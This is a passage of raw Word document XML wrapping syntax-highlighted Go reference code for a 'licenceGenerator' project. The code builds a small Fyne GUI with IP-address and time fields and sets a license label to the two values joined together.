    <w:p w14:paraId="6D76ACDC" w14:textId="77777777" w:rsidR="00704B19" w:rsidRPr="009822CF" w:rsidRDefault="00704B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535F75E3" w14:textId="77777777" w:rsidR="009822CF" w:rsidRDefault="009822CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D2E6EC" w14:textId="77777777" w:rsidR="009822CF" w:rsidRDefault="009822CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B38DB92" w14:textId="77777777" w:rsidR="009822CF" w:rsidRDefault="009822CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313903BA" w14:textId="214B1C1A" w:rsidR="00C03C14" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lic</w:t>
      </w:r>
      <w:r>
        <w:t>enceGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3C22CC" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRPr="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213E9A16" w14:textId="49941744" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">import </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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"fyne.io/fyne/v2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fyne.io/fyne/v2/app"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"fyne.io/fyne/v2/container"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fyne.io/fyne/v2/widget"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"time"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>updateTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(clock *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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t xml:space="preserve">formatted := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>time</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Now</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Format</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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="364135"/>
        </w:rPr>
        <w:t>Time: 03:04:05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</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t>clock.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(formatted)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>makeUI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() (*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">IpAddressOut := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewLabel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"IP address"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>输入框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">IpAddressIn := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewEntry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">//// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，如果改变则触发其他动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">IpAddressIn.OnChanged = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(content </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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t>LicenseOut.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(IpAddressIn.Text + TimeIn.Text)</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t>}</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// fyne/test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
